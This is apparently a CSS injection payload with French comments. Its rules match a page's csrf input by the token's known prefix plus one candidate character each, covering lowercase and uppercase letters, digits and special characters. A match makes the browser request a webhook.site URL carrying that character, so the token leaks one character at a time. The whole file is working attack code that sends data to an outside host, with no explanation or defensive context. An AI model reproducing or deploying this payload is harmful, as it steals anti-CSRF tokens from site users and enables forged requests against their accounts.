/* Minuscules */
input[name=csrf][value^="ruW-tjL1BWCda"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?a); }
input[name=csrf][value^="ruW-tjL1BWCdb"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?b); }
input[name=csrf][value^="ruW-tjL1BWCdc"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?c); }
input[name=csrf][value^="ruW-tjL1BWCdd"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?d); }
input[name=csrf][value^="ruW-tjL1BWCde"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?e); }
input[name=csrf][value^="ruW-tjL1BWCdf"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?f); }
input[name=csrf][value^="ruW-tjL1BWCdg"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?g); }
input[name=csrf][value^="ruW-tjL1BWCdh"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?h); }
input[name=csrf][value^="ruW-tjL1BWCdi"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?i); }
input[name=csrf][value^="ruW-tjL1BWCdj"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?j); }
input[name=csrf][value^="ruW-tjL1BWCdk"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?k); }
input[name=csrf][value^="ruW-tjL1BWCdl"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?l); }
input[name=csrf][value^="ruW-tjL1BWCdm"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?m); }
input[name=csrf][value^="ruW-tjL1BWCdn"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?n); }
input[name=csrf][value^="ruW-tjL1BWCdo"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?o); }
input[name=csrf][value^="ruW-tjL1BWCdp"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?p); }
input[name=csrf][value^="ruW-tjL1BWCdq"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?q); }
input[name=csrf][value^="ruW-tjL1BWCdr"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?r); }
input[name=csrf][value^="ruW-tjL1BWCds"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?s); }
input[name=csrf][value^="ruW-tjL1BWCdt"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?t); }
input[name=csrf][value^="ruW-tjL1BWCdu"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?u); }
input[name=csrf][value^="ruW-tjL1BWCdv"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?v); }
input[name=csrf][value^="ruW-tjL1BWCdw"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?w); }
input[name=csrf][value^="ruW-tjL1BWCdx"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?x); }
input[name=csrf][value^="ruW-tjL1BWCdy"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?y); }
input[name=csrf][value^="ruW-tjL1BWCdz"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?z); }

/* Majuscules */
input[name=csrf][value^="ruW-tjL1BWCdA"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?A); }
input[name=csrf][value^="ruW-tjL1BWCdB"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?B); }
input[name=csrf][value^="ruW-tjL1BWCdC"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?C); }
input[name=csrf][value^="ruW-tjL1BWCdD"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?D); }
input[name=csrf][value^="ruW-tjL1BWCdE"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?E); }
input[name=csrf][value^="ruW-tjL1BWCdF"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?F); }
input[name=csrf][value^="ruW-tjL1BWCdG"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?G); }
input[name=csrf][value^="ruW-tjL1BWCdH"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?H); }
input[name=csrf][value^="ruW-tjL1BWCdI"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?I); }
input[name=csrf][value^="ruW-tjL1BWCdJ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?J); }
input[name=csrf][value^="ruW-tjL1BWCdK"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?K); }
input[name=csrf][value^="ruW-tjL1BWCdL"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?L); }
input[name=csrf][value^="ruW-tjL1BWCdM"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?M); }
input[name=csrf][value^="ruW-tjL1BWCdN"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?N); }
input[name=csrf][value^="ruW-tjL1BWCdO"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?O); }
input[name=csrf][value^="ruW-tjL1BWCdP"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?P); }
input[name=csrf][value^="ruW-tjL1BWCdQ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Q); }
input[name=csrf][value^="ruW-tjL1BWCdR"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?R); }
input[name=csrf][value^="ruW-tjL1BWCdS"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?S); }
input[name=csrf][value^="ruW-tjL1BWCdT"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?T); }
input[name=csrf][value^="ruW-tjL1BWCdU"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?U); }
input[name=csrf][value^="ruW-tjL1BWCdV"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?V); }
input[name=csrf][value^="ruW-tjL1BWCdW"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?W); }
input[name=csrf][value^="ruW-tjL1BWCdX"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?X); }
input[name=csrf][value^="ruW-tjL1BWCdY"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Y); }
input[name=csrf][value^="ruW-tjL1BWCdZ"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?Z); }

/* Chiffres */
input[name=csrf][value^="ruW-tjL1BWCd0"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?0); }
input[name=csrf][value^="ruW-tjL1BWCd1"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?1); }
input[name=csrf][value^="ruW-tjL1BWCd2"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?2); }
input[name=csrf][value^="ruW-tjL1BWCd3"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?3); }
input[name=csrf][value^="ruW-tjL1BWCd4"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?4); }
input[name=csrf][value^="ruW-tjL1BWCd5"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?5); }
input[name=csrf][value^="ruW-tjL1BWCd6"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?6); }
input[name=csrf][value^="ruW-tjL1BWCd7"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?7); }
input[name=csrf][value^="ruW-tjL1BWCd8"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?8); }
input[name=csrf][value^="ruW-tjL1BWCd9"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?9); }

/* Caractères spéciaux */
input[name=csrf][value^="ruW-tjL1BWCd-"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?-); }
input[name=csrf][value^="ruW-tjL1BWCd_"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?_); }
input[name=csrf][value^="ruW-tjL1BWCd."] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?.); }
input[name=csrf][value^="ruW-tjL1BWCd~"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?~); }
input[name=csrf][value^="ruW-tjL1BWCd!"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?!); }
input[name=csrf][value^="ruW-tjL1BWCd@"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?@); }
input[name=csrf][value^="ruW-tjL1BWCd#"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?#); }
input[name=csrf][value^="ruW-tjL1BWCd$"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?$); }
input[name=csrf][value^="ruW-tjL1BWCd%"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?%25); } /* % encodé */
input[name=csrf][value^="ruW-tjL1BWCd^"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?^); }
input[name=csrf][value^="ruW-tjL1BWCd&"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?&); }
input[name=csrf][value^="ruW-tjL1BWCd*"] { background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?*); }
